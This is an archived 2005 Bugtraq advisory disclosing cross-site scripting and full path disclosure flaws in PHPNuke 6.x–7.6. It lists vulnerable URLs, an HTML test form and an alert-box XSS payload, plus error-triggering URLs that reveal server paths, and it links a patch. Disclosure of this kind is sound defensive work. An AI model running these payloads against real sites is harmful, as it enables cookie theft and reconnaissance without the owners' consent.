[SECURITYREASON.COM] Full path disclosure and XSS in PHPNuke part 3

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [SECURITYREASON.COM] Full path disclosure and XSS in PHPNuke part 3
From: sp3x <sp3x@xxxxxxxxxxxxxxxxxx>
Date: 5 Apr 2005 08:01:20 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


-=[ Full path disclosure and XSS in PHPNuke ]=-

Author: sp3x
Date: 5. April 2004

In Memory of John Poul II :
===========================

"Love converts hearts and gives peace," - John Poul II
"To milosc nawraca serca i daruje pokoj ludzkosci, ktora wydaje si&#281; czasem 
zagubiona i zdominowana przez sile zla, egoizmu i strachu" - Jan Pawe&#322; II 
[WIELKI]

Affected software :
===================
PHPNuke version : 6.x - 7.6

Description :
=============
PHP-Nuke is a Web Portal System, storytelling software, News system, online 
community or whatever you want to call it. The goal of PHP-Nuke is to have an 
automated web site to distribute news and articles with users system. Each user 
can submit comments to discuss the articles, just similar to Slashdot and many 
others. Main features include: web based admin, surveys, top page, access stats 
page with counter, user customizable box, themes manager for registered users, 
friendly administration GUI with graphic topic manager, option to edit or 
delete stories, option to delete comments, moderation system, Referers page to 
know who link us, sections manager, customizable HTML blocks, user and authors 
edit, an integrated Banners Ads system, search engine, backend/headlines 
generation (RSS/RDF format), and many, many more friendly functions. PHP-Nuke 
is written 100% in PHP and requires Apache Web server, PHP and a SQL (MySQL, 
mSQL, PostgreSQL, ODBC, ODBC_Adabas, Sybase or Interbase).
  Support for 25 languages, Yahoo like search engine, Comments option in Polls, 
lot of themes, Ephemerids manager, File Manager, Headlines, download manager, 
faq manager, advanced blocks systems, reviews system, newsletter, categorized 
articles, multilanguage content management, phpBB Forums included and a lot 
more.

Vulnerabilities :
*****************

Cross-site scripting - XSS :
============================

In PHPNuke there are XSS that can  be used to steal cookies and do other 
operations, which in
normal conditions are not permitted by browser's cross-domain security 
restrictions. 

Example :
=========  

http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=mailpasswd&username=[XSS]
http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=avatarlist&avatarcategory=[XSS]
http://[target]/[nuke_dir]/modules.php?name=Downloads&d_op=outsidedownloadsetup&lid=[XSS]

To test XSS for example in 
http://[target]/[nuke_dir]/modules.php?name=Downloads&d_op=outsidedownloadsetup&lid=[XSS]
 we can
create a form. 

test.html :
-----------
<form name="mantra" method="POST" 
action="http://[target]/[nuke_dir]/modules.php";>
<p>XSS: 
<input type="text" name="lid">
<br>
<input type="hidden" name="name" value="Downloads">
<br>
<input type="hidden" name="d_op" value="outsidedownloadsetup">
</p>
<p>
<input type="submit" name="Submit" value="Go!">
<br>
</p>
</form>
-----------------
And enter to inputfield "XSS" this :<body onload="alert('XSS')";> and click 
"Go!" :)

Full Path Disclosure :
======================

Full path to script must be kept in secret because it can  lead to successful 
attack on the
website. If the attacker know Full path to script , he can start searching some 
more info on others folders or about the server where the site is and  then try 
to break in.

Many scripts can be accessed directly and this will provoke standard
php error messages, which leads to full path disclosure. 

Examples :
----------

http://[target]/[nuke_dir]/index.php?forum_admin=1

Error message :
---------------
=====================================
Warning: main(): Unable to access ../../../config.php in 
/[info]/www/html/mainfile.php on line 104

Warning: main(../../../config.php): failed to open stream: No such file or 
directory in /[info]/www/html/mainfile.php on line 104

Fatal error: main(): Failed opening required '../../../config.php' 
(include_path='.:/php/includes:/usr/share/php') in 
/[info]/www/html/mainfile.php on line 104
======================================


More Full Path Disclosure :
---------------------------

http://[target]/[nuke_dir]/modules.php?name=Surveys&op=results&pollID=[id]&mode=&order=&thold=&tid=[something]

Error message :
---------------
=====================================
Fatal error: Cannot redeclare head() in /[info]/phpnuke/header.php on line 28
=====================================

http://[target]/[nuke_dir]/modules.php?name=Your_Account&op=avatarlist

Error message :
---------------
=====================================
Fatal error: Unknown function: nav() in 
/[info]/phpnuke/modules/Your_Account/index.php on line 1462
=====================================


How to fix :
============

Download the new version of the script or update.
The fix : www.securityreason.com/patch/SecurityReason-Fix[2].rar
Also on www.nukefixes.com the fix will be avaible soon 

Contact :
=========

sp3x[at]securityreason[dot].com
www.securityreason.com

Prev by Date: Logics Software BS2000 Host to Web Client ALL PLATFORMS
Next by Date: TSLSA-2005-0011 - kernel
Previous by thread: Logics Software BS2000 Host to Web Client ALL PLATFORMS
Next by thread: TSLSA-2005-0011 - kernel
Index(es):
- Date
- Thread